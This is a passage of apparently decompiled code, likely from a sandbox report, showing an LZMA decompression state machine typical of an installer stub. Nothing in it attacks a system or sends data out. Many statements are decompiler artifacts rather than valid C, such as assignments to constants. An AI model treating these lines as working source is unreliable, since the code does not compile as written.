						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
